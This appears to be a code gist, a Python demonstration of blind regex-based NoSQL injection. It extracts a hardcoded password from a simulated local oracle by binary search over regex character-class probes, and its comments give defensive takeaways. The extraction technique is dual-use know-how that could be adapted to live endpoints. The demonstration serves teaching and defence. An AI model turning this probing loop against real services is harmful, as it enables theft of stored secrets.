@UlisseMini
Created April 18, 2020 17:41
"""
Inspired by https://youtu.be/NO_lsfhQK_s (a.k.a. blind regex-based NoSQL injection)
"""
import re, time, string
# When set, inject() sleeps 50 ms on every call (presumably to mimic a
# remote round trip); set to False for an instant local run.
should_sleep: bool = True
# True: narrow the candidate set by halving it with a character-class regex
# on each oracle call. False: try every candidate character one at a time.
binary_search_blind: bool = True
# Number of oracle calls made so far; incremented by inject() and reported
# at the end of the run.
attempts: int = 0
# The secret the simulated oracle matches payloads against. The script
# rebuilds it one character at a time and compares its result to it at the end.
password: str = 'suPerSe&c3U2r^Rp(Aswo!rD'
def inject(payload):
    """Simulated boolean oracle: does the regex *payload* match the secret?

    Stands in for a backend that evaluates a caller-controlled pattern
    against stored data and reveals only whether it matched. Every call is
    counted in the module-level ``attempts`` and, when ``should_sleep`` is
    set, delayed by 50 ms.

    Args:
        payload: Regular-expression source. ``re.match`` anchors it at the
            start of the secret only; there is no implicit end anchor.

    Returns:
        True when ``password`` starts with a match of *payload*.
    """
    global attempts
    attempts += 1
    # Overwrite the same terminal line on each call so the progress display
    # stays on one line; the padding blanks out any longer previous payload.
    padding = ' ' * 30
    print(payload, end=padding + '\r')
    if should_sleep:
        time.sleep(0.05)
    matched = re.match(payload, password)
    return matched is not None
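# What this demonstrates: a backend that evaluates caller-supplied input as a
# regular expression against a secret and answers only "matched / not matched"
# leaks that secret a few bits per request. Defensive takeaways: validate that
# string-typed inputs really are plain strings, escape or reject regex
# metacharacters in user input, and alert on bursts of near-identical requests
# that differ only by a character class.

# Recovered prefix of the secret and the outer-loop flag. Both are module
# globals so the summary at the bottom can read them.
found = ''
keepGoing = True

# Each pass of the outer loop recovers one more character of the secret
# (or detects that the whole secret has been recovered).
while keepGoing:
    # Default charset: every printable ASCII character, with the space that
    # strip() removed added back. This is the contiguous range 32..126, which
    # is what makes the [lo-hi] range probe below equivalent to "in charset".
    charset = string.printable.strip() + ' '
    if binary_search_blind:
        # A character-class range must run from the lower code point to the
        # higher one ("Z-A" is a regex error), so keep the charset ordered.
        charset = ''.join(sorted(charset, key=ord))
        # Halve the candidate set per oracle call: roughly log2(95) ~ 7 calls
        # per character instead of up to 95 in linear mode.
        while len(charset) != 1:
            half = len(charset) // 2
            a = charset[:half]
            b = charset[half:]
            # Find which half the next character is in. This assumes the next
            # character is inside the charset at all.
            probe = '{}[{}-{}]'.format(
                re.escape(found), re.escape(a[0]), re.escape(a[-1]))
            if inject(probe):
                charset = a
            # A plain `else` could never detect the end of the secret: once
            # found == password no range matches, the search would narrow to
            # the last candidate and append it forever. The upper half always
            # ends at '~' (the highest printable), so when it has narrowed to
            # that single candidate, test it literally and stop if it fails.
            elif b == '~' and not inject(re.escape(found + b)):
                keepGoing = False
                break
            else:
                charset = b
        if len(charset) == 1 and keepGoing:
            found += charset
    else:
        # Linear mode: try each candidate in turn. A pass that finds nothing
        # means the prefix is complete, so the flag is reset before the pass
        # and only re-raised by a hit; without this reset the outer loop
        # never terminated once found == password.
        keepGoing = False
        for c in charset:
            if inject(re.escape(found + c)):
                keepGoing = True
                found += c

print()
print('Took %d attempts.' % attempts)
print('Correct?: {}'.format(password == found))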